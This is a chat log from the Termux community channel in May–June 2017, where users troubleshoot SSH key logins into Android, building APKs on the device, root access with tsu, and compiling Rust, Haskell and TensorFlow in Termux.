2017-05-29 22:29:59 aleph- https://doc.rust-lang.org/nightly/book/second-edition/
2017-05-29 22:31:19 gitter1 (vishalbiswas) Ah, I’m not deeply vested in rust. It is a hobby for me. I’ll probably follow kotlin as I’m more of an android dev
2017-05-29 22:32:39 gitter1 (vishalbiswas) Rust has been my first functional programming language (I’m scared of its syntax)
2017-05-29 22:41:22 aleph- Of rust? Or functional language paradigms/syntax?
2017-05-29 22:42:13 gitter1 (vishalbiswas) fn main() -> () { }
2017-05-29 22:43:15 gitter1 (vishalbiswas) python has the best syntax. It was a delight to learn and program with
2017-05-29 22:44:56 gitter1 (vishalbiswas) void maid() { }
is much smaller and readable
2017-05-29 22:45:12 gitter1 (vishalbiswas) * main()
2017-05-29 22:53:16 aleph- Eh, rust syntax is fine. Verbose is good at times.
2017-05-29 22:56:33 gitter1 (vishalbiswas) So, how is rustc fairing up for you?
2017-05-29 23:05:12 aleph- Haven’t compiled anything yet. Going to in a minute.
2017-05-30 00:12:23 aleph- Vishalbiswas, Rust works fine so far. Which build is this?
2017-05-30 00:12:25 aleph- Recent nightly?
2017-05-30 00:52:34 live_the_dreams its recent stable version
2017-05-30 01:24:26 aleph- Gotcha. Thanks.
2017-05-30 02:50:52 frumpylava anybody got bsdgames running?
2017-05-30 03:46:18 noncom if I have termux running a session on my android, can I connect to it via SSH?
2017-05-30 05:08:26 phil42 .
2017-05-30 05:09:45 frumpylava noncom: yes.
2017-05-30 05:10:29 frumpylava noncom: https://glow.li/tech/2015/11/06/run-an-ssh-server-on-your-android-with-termux.html
2017-05-30 05:11:21 noncom wow, super cool, thanks
2017-05-30 05:12:31 noncom hmm… googling gives this among its first results… I definitely should be better at employing search
2017-05-30 06:09:31 noncom hmm, I can’t find the folder where termux stores files
2017-05-30 06:09:37 noncom this: https://android.stackexchange.com/questions/166538/where-is-the-folder-that-termux-defaults-to does not help
2017-05-30 06:09:49 noncom there’s no “com.termux” folder in /data/data
2017-05-30 06:10:11 noncom and I need to get the ssh keys out of there…
2017-05-30 06:35:19 noncom oh, I’ve found out it is the root problem…
2017-05-30 06:35:23 noncom my phone is not rooted
2017-05-30 06:36:56 noncom oh my
2017-05-30 06:53:04 frumpylava noncom: You can just copy it to the internal sdcard and then copy with termux to the home directory.
2017-05-30 06:55:45 noncom yeah, that would work, I think… but considering all the other issues I am tired of having without being a root, I think, I should root it
2017-05-30 06:56:14 noncom so sad that rooting is considered to be something unusual or illegal
2017-05-30 06:57:12 frumpylava noncom: I’ve found workarounds for almost all issues relating to not being rooted. But for a few things it would be nice.
2017-05-30 09:12:39 code2501 hi
2017-05-30 09:25:54 code2501 hi
2017-05-30 10:18:31 frumpylava code2501: ĥi
2017-05-30 19:19:36 sielicki Finally got around to getting an strace for the pip install youtube-dl
issues I’m seeing
2017-05-30 19:22:55 sielicki Looks something like this: ‘'’openat(
2017-05-30 19:23:13 sielicki ‘fstat(<file descriptor 5>) = 0’ (fine)
2017-05-30 19:23:56 sielicki ‘ioctl(5, TCGETS, 0x7fe10d04d0) = -1 ENOTTY (Not a typewriter)’ (not sure why that’s being called)
2017-05-30 19:24:17 sielicki then lseek(5, 0, SEEK_CUR) —-> sigsegv
2017-05-30 20:42:11 live_the_dreams radare2 doesn’t match sha checksum
2017-05-30 20:45:37 live_the_dreams hm sielicki what arch you using and has it ever worked previously
2017-05-30 20:48:12 sielicki live_the_dreams: aarch64 via nexus 5x.
2017-05-30 20:49:50 live_the_dreams did it work previously? never tried?
2017-05-30 20:55:34 sielicki Never tried.
2017-05-30 20:56:14 sielicki Worth mentioning this device is on the android O beta program, would not surprise me if that’s what’s doing this
2017-05-30 21:16:55 live_the_dreams yeah android O no test available could very well be a lib error on their part…
2017-05-30 21:53:29 sielicki any good way to confirm that?
2017-05-30 21:54:22 sielicki https://github.com/termux/termux-app/issues/299 this seems related
2017-05-30 21:56:56 sielicki this may be relevant https://developer.android.com/preview/behavior-changes.html#rmp
2017-05-30 22:05:52 sielicki https://github.com/termux/termux-app/blob/master/app/src/main/AndroidManifest.xml i’m not big into android development, why does termux have the WRITE_EXTERNAL_STORAGE but not READ_EXTERNAL_STORAGE?
2017-05-30 22:06:49 sielicki Given the example from the Android O behavior-changes given above, I wonder if that could be related. Though they mention that it only affects permissions where both are specified in the manifest, so maybe that’s not it.
2017-05-30 22:23:41 gitter1 (tojo2ska8) hi there , how i can install haskell in termux
2017-05-30 22:27:29 sdrausty apt install haskell
2017-05-30 22:27:57 sdrausty Unable to locate package haskell
2017-05-30 22:28:09 sdrausty build it
2017-05-30 22:28:23 sdrausty package it
2017-05-30 22:30:27 sdrausty https://github.com/termux/termux-create-package
2017-05-30 22:31:01 gitter1 (vishalbiswas) its not a piece of cake
2017-05-30 22:31:14 gitter1 (vishalbiswas) Haskell will take some time
2017-05-30 22:31:17 gitter1 (tojo2ska8) thanks dude , i will try it
2017-05-30 22:32:34 gitter1 (vishalbiswas) sielicki: can you paste the whole strace -y -f
somewhere?
2017-05-30 22:35:53 sdrausty https://sdrausty.github.io/buildAPKs/
2017-05-31 02:37:25 michcioperz hi, somewhat silly question, has anyone here tried compiling tensorflow on termux?
2017-05-31 02:38:07 frumpylava michcioperz: Yes, some people tried. https://github.com/termux/termux-packages/issues/784
2017-05-31 02:38:35 michcioperz thank you
2017-05-31 06:20:16 gitter1 (noncom) I am having troubles connecting to Termux via SSH
2017-05-31 06:21:03 gitter1 (noncom) I have followed the advice https://oliverse.ch/tech/2015/11/06/run-an-ssh-server-on-your-android-with-termux.html and here’s what I get on attempting to connect with sshd -d
: http://joxi.ru/l2ZvX9LuwWejn2
2017-05-31 06:21:58 gitter1 (noncom) does this error message make sense to anyone?
2017-05-31 06:26:37 gitter1 (sdrausty) @noncom did you ssh-keygen
2017-05-31 06:27:25 gitter1 (sdrausty) I’m looking for opinions regarding:
2017-05-31 06:27:59 gitter1 (sdrausty) https://sdrausty.github.io/buildAPKs/easilyBuildAndroidAPKsonDevice
2017-05-31 06:28:32 gitter1 (noncom) @sdrausty yes.. I have generated the keys using ssh-keygen
in Termux… I was following the aforementioned guide precicely
2017-05-31 06:29:28 gitter1 (noncom) @sdrausty can’t say anything particular about the tool you’ve posted, but creating APKs on a device is not something new… AIDE does this every time…
2017-05-31 06:30:46 gitter1 (noncom) hmm, i would like to know more on how can I use this APK builder…
2017-05-31 06:30:56 gitter1 (noncom) like, examples
2017-05-31 06:32:00 gitter1 (sdrausty) It’s not new to Termux either. However, it seems to me we should be able to build terrmux-app in Termux…
2017-05-31 06:32:36 gitter1 (noncom) maybe it is just that I am misunderstood it :D you’re saying to build Termux itself in Termux!!!
2017-05-31 06:32:40 gitter1 (noncom) that sounds amazing
2017-05-31 06:32:48 gitter1 (sdrausty) packages install aapt apksigner dx ecj git
2017-05-31 06:32:48 gitter1 (sdrausty) git clone ://github.com/sdrausty/buildAPKs
2017-05-31 06:32:48 gitter1 (sdrausty) ./buildAPKs/buildMyFirstAKPinTermux.sh
2017-05-31 06:33:07 sdrausty packages install aapt apksigner dx ecj git
2017-05-31 06:33:07 sdrausty git clone https://github.com/sdrausty/buildAPKs
2017-05-31 06:33:07 sdrausty ./buildAPKs/buildMyFirstAKPinTermux.sh
2017-05-31 06:33:20 gitter1 (noncom) great!
2017-05-31 06:42:35 gitter1 (sdrausty) ssh
works fine. I have not had any problems. If you cannot figure it out soon, bring it up at https://github.com/termux/termux-packages/issues
2017-05-31 06:44:15 gitter1 (noncom) yeah, thanks!
2017-05-31 07:03:25 joco42 how can i press shift in termux ?
2017-05-31 07:03:31 joco42 i would need that for org mode in emacs
2017-05-31 07:27:37 gitter1 (noncom) joco42: aren’t you using Hackers Keyboard or anything similar already?
2017-05-31 07:27:41 joco42 yes
2017-05-31 07:27:43 joco42 i do
2017-05-31 07:27:46 joco42 mesagease
2017-05-31 07:27:51 joco42 but that does not have that
2017-05-31 07:28:09 joco42 https://play.google.com/store/apps/details?id=com.exideas.mekb&hl=hu
2017-05-31 07:28:19 joco42 https://play.google.com/store/apps/details?id=com.exideas.mekb
2017-05-31 08:12:38 frumpylava joco42: How do you normally type an upper case letter? Usually you don’t actually have to press shift+letter
2017-05-31 08:14:31 gitter1 (noncom) michcioperz may I ask you what are you going to use tensorflow for?
2017-05-31 08:15:00 michcioperz I just wanted to try installing it on the phone
2017-05-31 08:15:25 michcioperz going to a machine learning event today, hoped there would be a way to not bring my laptop
2017-05-31 08:15:40 gitter1 (noncom) ah, I see! thanks :)
2017-05-31 08:19:09 live_the_dreams tensorflow requires bazel
2017-05-31 08:19:09 live_the_dreams to instal,
2017-05-31 08:19:21 live_the_dreams bazel requres jdk
2017-05-31 08:19:44 live_the_dreams jdk available is 9 only within termux
2017-05-31 08:19:56 live_the_dreams needs 8 jre
2017-05-31 08:21:27 michcioperz I have an i686, thought it would be doable
2017-05-31 08:21:49 live_the_dreams it should be … just not in termux
2017-05-31 08:22:25 live_the_dreams needs a chroot …
2017-05-31 08:36:23 michcioperz needs it for sure?
2017-05-31 08:40:50 live_the_dreams yeah something like linux deploy
2017-05-31 08:41:07 live_the_dreams even then i dunno
2017-05-31 08:41:09 live_the_dreams ..
2017-05-31 08:42:00 michcioperz alright I’ll just SSH into something then
2017-05-31 11:01:46 joco42 frumpylava: yes, i tried to type upper case letter, but that does not really work with arrow keys….
2017-05-31 11:02:04 joco42 for example alt-shift-left arrow
2017-05-31 11:17:48 gitter1 (vishalbiswas) live_the_dream: wasn’t that error with tensor flow occurring because they haven’t updated their tools for the latest jdk commit? They may have fixed it now.
2017-05-31 11:20:36 gitter1 (sdrausty) @vishalbiswas can I get your opinion about https://sdrausty.github.io/buildAPKs/reallyEasilyBuildAndroidAPKsonDevice when you have the chance please?
2017-05-31 11:41:02 gitter1 (vishalbiswas) @sdrausty how to use?
2017-05-31 11:47:17 gitter1 (vishalbiswas) @sdrausty You should move sourceapksbuiltondevice to another repo and add it as a submodule in main repo
2017-05-31 11:48:01 gitter1 (vishalbiswas) so that people who don’t want sample apps can clone the repo without submods
2017-05-31 11:48:16 gitter1 (sdrausty) ```
2017-05-31 11:48:16 gitter1 (sdrausty)
2017-05-31 11:48:16 gitter1 (sdrausty) ```
2017-05-31 11:48:33 gitter1 (sdrausty) ``` packages install aapt apksigner dx ecj git
2017-05-31 11:48:33 gitter1 (sdrausty) git clone https://github.com/sdrausty/buildAPKs
2017-05-31 11:48:33 gitter1 (sdrausty) ./buildAPKs/buildMyFirstAKPinTermux.sh ```
2017-05-31 11:49:42 gitter1 (sdrausty) H
2017-05-31 11:50:58 gitter1 (sdrausty) Thank you. I have some reading to do https://github.com/blog/2104-working-with-submodules
2017-05-31 11:52:17 gitter1 (vishalbiswas) @sdrausty Is there a way to install support libraries (from maven repos or binaries)?
2017-05-31 11:52:45 gitter1 (vishalbiswas) My app fails because it uses AppCompat
2017-05-31 11:54:11 gitter1 (sdrausty) Very good question! Can you bring that up on https://github.com/sdrausty/buildAPKs/issues
2017-05-31 11:55:10 gitter1 (sdrausty) I have tinkered a little with ./gradlew
2017-05-31 11:56:53 gitter1 (sdrausty) Tried ln -s ecj jave
and there was improvement in how it ran, but gradlew
never got to compilation.
2017-05-31 11:58:33 gitter1 (sdrausty) https://www.google.com/search?q=maven+libraries+download
2017-05-31 12:03:12 gitter1 (sdrausty) * ln -s ecj java
2017-05-31 12:06:33 gitter1 (vishalbiswas) @sdrausty What are you proposing? I don’t get it
2017-05-31 12:07:11 gitter1 (sdrausty) ./gradlew
2017-05-31 12:07:11 gitter1 (sdrausty) Unrecognized option : -Dorg.gradle.appname=gradlew
2017-05-31 12:07:55 gitter1 (sdrausty) Before linking ecj
to java
2017-05-31 12:08:14 gitter1 (vishalbiswas) But what does ot achieve?
2017-05-31 12:08:47 gitter1 (sdrausty) org.gradle.appname=gradlew
2017-05-31 12:08:47 gitter1 (sdrausty) $ ./gradlew
2017-05-31 12:08:47 gitter1 (sdrausty)
2017-05-31 12:08:47 gitter1 (sdrausty) [full message: https://gitter.im/termux/termux?at=592eea8e5e34568d5eac8923]
2017-05-31 12:09:25 gitter1 (sdrausty) JAVA_HOME seems to set itself up…
2017-05-31 12:13:09 gitter1 (sdrausty) $ ack "\-Dorg.gradle.appname"
2017-05-31 12:13:09 gitter1 (sdrausty) gradlew
2017-05-31 12:13:09 gitter1 (sdrausty) 165:eval set – $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS “"-Dorg.gradle.appname=$APP_BASE_NAME"” -classpath “"$CLASSPATH"” org.gradle.wrapper.GradleWrapperMain “$APP_ARGS”
2017-05-31 12:13:09 gitter1 (sdrausty) [full message: https://gitter.im/termux/termux?at=592eeb94c4d73f445a00d3a1]
2017-05-31 12:14:57 gitter1 (sdrausty) This gradlew
is from https://github.com/termux/termux-app/issues
2017-05-31 12:15:27 gitter1 (sdrausty) * https://github.com/termux/termux-app
2017-05-31 12:16:06 gitter1 (sdrausty) I’m considering adding an issue at terrmux-app
2017-05-31 12:16:07 gitter1 (sdrausty)
2017-05-31 12:17:46 gitter1 (sdrausty) But it might be easier to write a script from scratch than tinkering with gradlew
2017-05-31 12:25:43 gitter1 (vishalbiswas) gradlew is just a wrapper for gradle
2017-05-31 12:26:04 gitter1 (vishalbiswas) It downloads gradle and runs it
2017-05-31 12:27:04 gitter1 (sdrausty) The process seems simple enough.
2017-05-31 12:27:53 gitter1 (sdrausty) Extract the libraries list, download, link and compile.
2017-05-31 12:30:55 gitter1 (sdrausty) Who needs gradle
or gradlew
if the do not work in Termux? wget
thrown into the script and elbow grease might be all that is missing.
2017-05-31 12:33:48 gitter1 (sdrausty) Let’s leave the stoneage and the era of the whirling computer fans behind.
2017-05-31 13:00:47 goonza hi?
2017-05-31 13:01:51 goonza is someone herE?
2017-05-31 13:51:08 frumpylava goonza: yes
2017-05-31 14:12:33 goonza i want to open something from termux on my computer with ssh
2017-05-31 14:14:11 goonza what i need to do in my computer(windows 7) to let me connect with ssh from termux
2017-05-31 14:14:15 xelra goonza: Be more specific please. What are you doing?
2017-05-31 14:14:30 xelra Oh, Windows.
2017-05-31 14:14:34 xelra Windows is special.
2017-05-31 14:14:43 xelra You need to install an SSH server for Windows.
2017-05-31 14:14:46 goonza in an exercise i need to open xeyes on my computer, should i try on ubuntu?
2017-05-31 14:15:08 goonza can i use cygwin?
2017-05-31 14:15:34 xelra Yes, you can. There are tutorials for how to run an SSH server with Cygwin.
2017-05-31 14:15:55 goonza oh thanks, ill go search for something.
2017-05-31 14:16:03 goonza :)
2017-05-31 14:16:27 xelra Once your SSH server is set up, you can SSH just like with any Unix system.
2017-05-31 14:17:08 goonza nice
2017-05-31 14:17:26 xelra In termux, what you should have installed is bash, bash-completion and ssh.
2017-05-31 14:17:46 goonza Yeah thanks i think i found something
2017-05-31 14:17:55 xelra That makes for a nice experience, because you can complete server addresses with the tab key.
2017-05-31 14:18:26 xelra If you need basic help about SSH in general, see you back in #openssh. :)
2017-05-31 14:19:10 goonza oh that
2017-05-31 14:19:32 goonza openssh is another command? im actually really new to this
2017-05-31 14:19:57 xelra OpenSSH is the implementation of SSH that runs on almost every Unix server in the world.
2017-05-31 14:20:12 goonza when i try using it it tells me if i tried to use openssl
2017-05-31 14:20:22 goonza from openssl-tools or something like that
2017-05-31 14:20:32 goonza or termux has it on ssh?
2017-05-31 14:20:59 xelra Wait, I’m gonna check in my termux.
2017-05-31 14:21:16 xelra The package is either called openssh or ssh.
2017-05-31 14:22:21 xelra Yeah, it’s called openssh
2017-05-31 14:22:38 goonza man ssh says : Name shh - openssh ssh client
2017-05-31 14:23:10 xelra Yes, that’s what you need to connect to an ssh server.
2017-05-31 14:23:41 xelra The command would look like this: ssh user@1.2.3.4
2017-05-31 14:24:07 xelra Then you enter the password for the user and it logs you in.
2017-05-31 14:24:11 goonza exactly, so to u use openssh its by using ssh
2017-05-31 14:24:16 goonza ?
2017-05-31 14:24:19 xelra Yes.
2017-05-31 14:24:43 goonza ok that was confusing haha
2017-05-31 14:25:10 goonza ok thanks ill go try to open ssh con cygwin
2017-05-31 15:05:39 gitter1 (noncom) guys
2017-05-31 15:05:49 gitter1 (noncom) I did already ask, but I try my luck again
2017-05-31 15:06:03 gitter1 (noncom) I am having troubles connecting to Termux via SSH
2017-05-31 15:06:09 gitter1 (noncom) I have followed the advice https://oliverse.ch/tech/2015/11/06/run-an-ssh-server-on-your-android-with-termux.html and here’s what I get on attempting to connect with sshd -d: http://joxi.ru/l2ZvX9LuwWejn2
2017-05-31 15:06:12 gitter1 (noncom) does this error message make sense to anyone?
2017-05-31 17:44:33 xelra noncom: Well, it says that public key authentication failed.
2017-05-31 17:48:51 Exaeta_ Is there a way to change the standard library used with clang++?
2017-05-31 17:49:07 Exaeta_ For some reason, it ships with one missing std::to_string which is required by the application I am trying to build
2017-05-31 17:57:06 live_the_dreams no but there is an alternative
2017-05-31 17:57:09 live_the_dreams https://stackoverflow.com/questions/22774009/android-ndk-stdto-string-support
2017-05-31 18:23:38 Exaeta_ Humm so how do I include my own std::to_string in the project?
2017-05-31 18:23:56 Exaeta_ I would need to get cmake to insert that into every file…
2017-05-31 18:24:50 live_the_dreams or you could edit a header file
2017-05-31 18:25:05 Exaeta_ black magic :o
2017-05-31 22:43:26 GarDotJar hello ?
2017-05-31 22:56:40 JarDotGar clear
2017-05-31 22:56:43 JarDotGar ah shit
2017-05-31 22:59:09 gitter1 (vishalbiswas) @noncom still here?
2017-05-31 23:00:52 gitter1 (vishalbiswas) @noncom https://termux.com/ssh.html
2017-05-31 23:24:19 rods-tab3 will termux run on the qualcomm kyro cpus ? https://en.m.wikipedia.org/wiki/Kryo_(microarchitecture)
2017-05-31 23:42:51 live_the_dreams errr … yes
2017-05-31 23:43:18 live_the_dreams that is aarch64
2017-05-31 23:57:23 rods-tab3 ok, thanks
2017-06-01 01:49:43 frumpylava I’m having an argument with a dev on why hard-coding paths like /bin/sh is a bad idea. https://github.com/jamessan/vim-gnupg/issues/80
2017-06-01 01:49:50 frumpylava Anybody have any better arguments?
2017-06-01 04:03:22 grepper “env sh” ?
2017-06-01 04:04:44 frumpylava grepper: Yeah, or just “sh” works too. It’s how I fixed it locally.
2017-06-01 04:52:01 fornwall frumpylava: I guess the main argument to change “/bin/sh” to “sh” is that “a lot of people already call ‘sh’ and it works, fixes issues on prefixed systems without breaking anything”
2017-06-01 04:53:08 fornwall frumpylava: in https://github.com/ffi/ffi/pull/528 the developer of the ruby ffi worried about the possibility of ‘sh’ not being in $PATH, but I’ve never heard of such a system
2017-06-01 04:58:27 frumpylava fornwall: I guess the only real argument against it is that some malicous programm could put a sh
somewhere else and add it to hte $PATH. But I am not sure if this really is an interessting attack vector.
2017-06-01 06:04:32 gitter1 (noncom) @vishalbiswas thanks, but what you cite is a plain tutorial which does not answer the question… and which I have already followed the steps of
2017-06-01 06:06:59 gitter1 (vishalbiswas) You can the use scp
2017-06-01 06:07:19 gitter1 (vishalbiswas) To transfer files
2017-06-01 06:07:55 gitter1 (vishalbiswas) @noncom https://www.google.co.in/url?sa=t&source=web&rct=j&url=https://winscp.net/&ved=0ahUKEwiR5reis5zUAhVGQ48KHY7rCrgQFggcMAA&usg=AFQjCNEH3QRcknVwFtVud-4q5balXr0Yfg&sig2=xaa6vXkCJ3pS4EPP8IJQ2w
2017-06-01 06:09:00 gitter1 (vishalbiswas) Once you add your ssh key and start sshd, you can transfer files using ssh
2017-06-01 06:11:53 gitter1 (noncom) yeah, I did all this…
2017-06-01 06:12:14 gitter1 (noncom) the problem is that when I am trying to establish an SSH connection using the keys pair, that’s what I get
2017-06-01 06:12:20 gitter1 (noncom) and the connection is not established
2017-06-01 06:18:49 gitter1 (vishalbiswas) @noncom Are you sure?
2017-06-01 06:19:48 gitter1 (vishalbiswas) sshd is not able to find /data/data/com.termux/files/home/.ssh/authorized_keys
2017-06-01 06:33:35 live_the_dream the only systems that i can imagine not having sh are embedded ones
2017-06-01 06:44:07 gitter1 (noncom) @vishalbiswas hmmmm, I am pretty much sure… but I will re-check everything again
2017-06-01 06:53:27 gitter1 (noncom) confirming, yes
2017-06-01 06:53:31 gitter1 (noncom) the file is there
2017-06-01 06:53:38 gitter1 (noncom) I can cat
it and see my key
2017-06-01 06:54:08 gitter1 (noncom) an attempt to log in to SSH from either Win or Mac results in the abovementioned error message
2017-06-01 07:05:55 gitter1 (vishalbiswas) You haven’t done it correctly. That error message means that the connecting user isn’t in authorized users list
2017-06-01 07:07:04 gitter1 (vishalbiswas) Make sure u r using the same ssh key whose public key was added in authorized_keys
@noncom
2017-06-01 08:02:29 gitter1 (noncom) eh
2017-06-01 08:05:41 gitter1 (noncom) yes, I am sure.. I have just tried all that again… :(
2017-06-01 08:05:51 gitter1 (noncom) what the luck..
2017-06-01 08:06:26 gitter1 (noncom) I’ve tried both with a passphrase and without it
2017-06-01 08:06:37 gitter1 (noncom) when it had a passphrase, it was never accepted
2017-06-01 08:06:45 gitter1 (noncom) and this is the error that I get when the passphrase is empty
2017-06-01 08:07:36 Anic Hello, I got a question. Is there a way to have packages working once I use ‘su’?
2017-06-01 08:16:55 gitter1 (vishalbiswas) apt install tsu
2017-06-01 08:17:10 gitter1 (vishalbiswas) Then use tsu
instead of su
2017-06-01 08:21:27 Anic hm… I get a ‘bad interpreter: Permission denied’ error when I run tsu
2017-06-01 08:23:45 Anic actually, I can run tsu but I get Permission denied for all commands
2017-06-01 08:25:16 Anic Nevermind… I read the help and figured it out. Thank you and sorry for the bother
2017-06-01 09:06:04 ClockGen Hello, anybody had luck with sshd?
2017-06-01 09:06:54 ClockGen As I understand, password method is disabled at all since android user have no password
2017-06-01 09:08:27 ClockGen And while trying to auth with ssh key, connectbot says “key exchange was not finished”
2017-06-01 09:08:53 ClockGen Dropbear server works fine with ssh keys, though
2017-06-01 09:09:22 gitter1 (sumanthgavini) unable to install termux, without internet.
2017-06-01 09:10:02 gitter1 (sumanthgavini) how to open the termux application in android.
2017-06-01 09:10:43 gitter1 (sumanthgavini) without the internet
2017-06-01 09:11:01 ClockGen Also, sshd with -dd option says that no matching host key type found
2017-06-01 09:11:23 ClockGen While I’m trying to connect with connectbot
2017-06-01 09:38:43 frumpylava ClockGen: Have you seen this already? https://glow.li/tech/2015/11/06/run-an-ssh-server-on-your-android-with-termux.html
2017-06-01 09:50:35 ClockGen I havent, but nothing new here, the ssh daemon itself replies that my client program have no suitable key type
2017-06-01 09:52:28 frumpylava Can you paste the whole sshd output (to like pastebin or something)?
2017-06-01 10:11:12 ClockGen debug1: kex: algorithm: curve25519-sha256@libssh.org
2017-06-01 10:11:44 ClockGen Which is strange, since I generated this keypair in termux, with ssh-keygen
2017-06-01 10:13:42 frumpylava ClockGen: Are you sure you haven’t mixed up the public and the private key?
2017-06-01 10:14:06 ClockGen It works with other clients
2017-06-01 10:14:24 ClockGen Including ssh itself
2017-06-01 10:14:45 ClockGen And also what is strange, that the reported key type is dsa
2017-06-01 10:14:52 ClockGen Since my keypair is rsa
2017-06-01 10:21:34 ClockGen Ok well I guess there is a bug in connectbot, I just generated a new pair of rsa keys, added to authorized_keys, restarted the server and tried to login, but my client still reports ecdsa key type
2017-06-01 10:25:29 ClockGen Or not the client, since it connects fine to other ssh servers, like dropbear
2017-06-01 11:06:42 onexore Hi guys …
2017-06-01 14:43:28 m0ss Hi
2017-06-01 14:51:57 gitter1 (sdrausty) Hello
2017-06-01 15:06:51 m0ss Hi guys.
2017-06-01 15:09:23 gitter1 (sdrausty) m0ss: Hello
2017-06-02 01:04:36 sdrausty https://plus.google.com/109614420080028230010/posts/CFK8nZQqz9B
2017-06-02 02:04:38 frumpylava sdrausty: That seems cool. I’m trying to build that 16-bit-clock now, but I get errors: “/res/values/styles.xml:7: error: Error retrieving parent for item: No resource found that matches the given name ‘android:Theme.Light’”
2017-06-02 02:08:44 gitter1 (sdrausty) frumpylava: https://sdrausty.github.io/buildAPKs/reallyEasilyBuildAndroidAPKsonDevice
2017-06-02 02:09:06 th30nE I’m new to termux. Can I get some help regarding moving a file!?
2017-06-02 02:09:24 gitter1 (sdrausty) man mv
2017-06-02 02:10:08 sdrausty th30nE
2017-06-02 02:10:27 th30nE I tried with mv. but it says can’t rename..!!
2017-06-02 02:10:54 gitter1 (sdrausty) Try cp
2017-06-02 02:11:22 frumpylava sdrausty: yeah, I also did that. Error: “./res/drawable/prism_tab.xml:7: error: No resource identifier found for attribute ‘drawable’ in package ‘android’”
2017-06-02 02:11:45 gitter1 (sdrausty) WOW
2017-06-02 02:12:37 gitter1 (sdrausty) All tests up till now have built and installed OK.
2017-06-02 02:13:43 gitter1 (sdrausty) Are you building with build.sh or builda.sh?
2017-06-02 02:15:41 gitter1 (sdrausty) frumpylava: Are you building in Termux on device?
2017-06-02 02:16:47 frumpylava whatever it is in ./buildAPKs/buildMyFirstAKPinTermux.sh. builda.sh, I think
2017-06-02 02:17:01 frumpylava sdrausty: https://glow.li/share/buildapks.html
2017-06-02 02:17:08 frumpylava Yes, I’m building on termux.
2017-06-02 02:21:00 gitter1 (sdrausty) It’s somekind of error and your using builda.sh
2017-06-02 02:21:30 frumpylava sdrausty: But I also tried build.sh, same error.
2017-06-02 02:22:51 gitter1 (sdrausty) Try one of the other sources v
2017-06-02 02:24:07 gitter1 (sdrausty) cd ./sourceOfAPKsBuiltOnDevice/cw-android/Basic/CheckBox
2017-06-02 02:24:13 frumpylava sdrausty: with builda.sh or build.sh?
2017-06-02 02:24:57 gitter1 (sdrausty) ../../../../scripts/builds.sh
2017-06-02 02:25:19 gitter1 (sdrausty) Either should work.
2017-06-02 02:26:44 gitter1 (sdrausty) frumpylava: what’s your architecture?
2017-06-02 02:27:07 frumpylava sdrausty: Same kind of errors for cw-android, Just-a-damn-compass, cowsay-android, moon and abstract-art
2017-06-02 02:27:15 frumpylava aarch64
2017-06-02 02:28:57 gitter1 (sdrausty) These APK compiles have only been tested on arm and aarch64 cat /proc/cpuinfo
fir more.
2017-06-02 02:29:58 frumpylava sdrausty: AArch64 Processor rev 4 (aarch64)
2017-06-02 02:30:32 gitter1 (sdrausty) frumpylava: don’t get where your errors can be coming from. Have any APKs built?
2017-06-02 02:30:43 frumpylava no.
2017-06-02 02:31:00 gitter1 (sdrausty) Not good
2017-06-02 02:31:56 gitter1 (sdrausty) Bring this up at https://github.com/sdrausty/buildAPKs/issues
2017-06-02 02:45:35 frumpylava done
2017-06-02 02:47:35 gitter1 (sdrausty) Cool. Sucks your getting these errors. There’s a bunch of them…
2017-06-02 02:51:10 gitter1 (sdrausty) A number of people have tried out https://sdrausty.github.io/buildAPKs/easilyBuildAndroidAPKsonDevice successfully.
2017-06-02 02:52:17 gitter1 (sdrausty) frumpylava: What do you think could be causing those errors?
2017-06-02 02:53:18 gitter1 (sdrausty) frumpylava v did you apt update && apt upgrade
?
2017-06-02 03:03:10 frumpylava yes. Perhaps I’m missing some package that you have installed? Can you paste you apt list --installed
somewhere so I can check what you have and I don’t?
2017-06-02 03:04:33 gitter1 (sdrausty) apt install *
is what is installed…
2017-06-02 03:05:12 frumpylava sdrausty: You installed everything?
2017-06-02 03:05:47 gitter1 (sdrausty) However ⛵ apt install *
brings up conflicts.
2017-06-02 03:06:37 gitter1 (sdrausty) Can we write a script to install everything without conflicts? I think we should.
2017-06-02 03:14:43 frumpylava gitter1: what android version are you on?
2017-06-02 03:14:55 frumpylava ^@sdrausty
2017-06-02 03:17:23 gitter1 (sdrausty) frumpylava: https://sdrausty.github.io/buildAPKs/reallyEasilyBuildAndroidAPKsonDevice
2017-06-02 03:18:41 frumpylava @sdrausty that doesn’t answer my question.
2017-06-02 03:19:24 sdrausty frumpylava: I am using a number of on devices.
2017-06-02 03:19:42 sdrausty How about you?
2017-06-02 03:19:42 frumpylava Any of them android 7.0?
2017-06-02 03:19:50 frumpylava 7.0
2017-06-02 03:20:15 sdrausty They are not Andoid O, fir sure.
2017-06-02 03:20:33 frumpylava Android N
2017-06-02 03:20:45 sdrausty is yours 7?
2017-06-02 03:20:57 frumpylava yes
2017-06-02 03:21:49 sdrausty try out https://sdrausty.github.io/buildAPKs/reallyEasilyBuildAndroidAPKsonDevice on an older device, please.
2017-06-02 03:22:13 sdrausty 6
2017-06-02 03:22:39 frumpylava sdrausty: I don’t have any older devices.
2017-06-02 03:30:24 gitter1 (sdrausty) Can we write a script to install everything apt install *
without conflicts? I think we should. Where should this be brought up as an issue?
2017-06-02 03:44:33 frumpylava @sdrausty, that’s a pretty ridicolous thing to do. Do you really need all packages?
2017-06-02 03:44:42 frumpylava But sure, go ahead:
2017-06-02 03:44:44 frumpylava apt list | grep -v “Listing…” | cut -d ‘/’ -f 1 | xargs -n 1 apt install -y |
2017-06-02 03:46:23 frumpylava This will just replace conflicts with whatever is further down the list.
2017-06-02 03:59:37 frumpylava By the way, the Chihaya Torrent Tracker works pretty great in Termux. I use it to create a local only tracker, then use transmission-create to create a private torrent. I can now pretty easily share files with other people in the same network. I’ll use this at conferences and congresses.
2017-06-02 04:08:58 gitter1 (sdrausty) frumpylava: sounds good!
2017-06-02 04:21:56 live_the_dream if anyone is interested … almost have gcc-7 ready
2017-06-02 05:13:59 frumpylava Oh wow weird. @sdrausty’s buildapks thing works in https://github.com/Neo-Oli/chrooted-termux, but not on the host system. So there must be some config I did or some thing that is available on the host system that isn’t in the fresh chrooted-termux
2017-06-02 05:33:34 frumpylava I wonder what that difference could be.
2017-06-02 10:39:14 th30nE can
2017-06-02 11:44:45 Parthanon Ayo
2017-06-02 12:19:43 parthanon guys why is there no Bitchx on Termux? Just asking…
2017-06-02 12:21:25 rods-tab3 but there is profanity
2017-06-02 12:23:34 parthanon whats profanity..
2017-06-02 12:29:22 parthanon Fiiiiine ill check it out
2017-06-02 12:30:56 parthanon Ok wait so which is better, irssi or profanity
